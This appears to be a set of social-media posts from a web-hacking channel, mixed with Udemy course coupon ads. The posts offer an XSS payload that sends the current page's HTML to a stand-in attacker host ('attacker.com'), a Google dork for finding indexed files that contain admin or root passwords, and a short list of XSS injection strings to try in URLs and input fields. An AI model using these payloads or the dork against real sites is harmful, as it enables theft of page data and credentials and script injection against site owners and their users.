🎯A payload that sends current webpage to remote server

<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

🎯Want administrator's creds? Google has indexed it for you:

intext:company_keyword & ext:txt | ext:sql | ext:cnf | ext:config | ext:log & intext:"admin" | intext:"root" | intext:"administrator" & intext:"password" | intext:"root" | intext:"admin" | intext:"administrator"

Master in Hacking with XSS Cross Site Scripting

Learn the most common flaws in web applications

https://www.udemy.com/xss-cross-site-scripting/?couponCode=ONE_LAKH_FREE

Python Essentials | Mastering Programming with Python

Learn and Master modern Python Fast, know how it works with examples and dive deep into it in a short time.

https://www.udemy.com/python-essentials-mastering-programming-with-python/?couponCode=PI314DIR5P10

@WebHacking

Here's a small #XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:
- URL query, fragment & path;
- all input fields.

Here's an updated polyglot that uses the details tag and now breaks out of template strings too.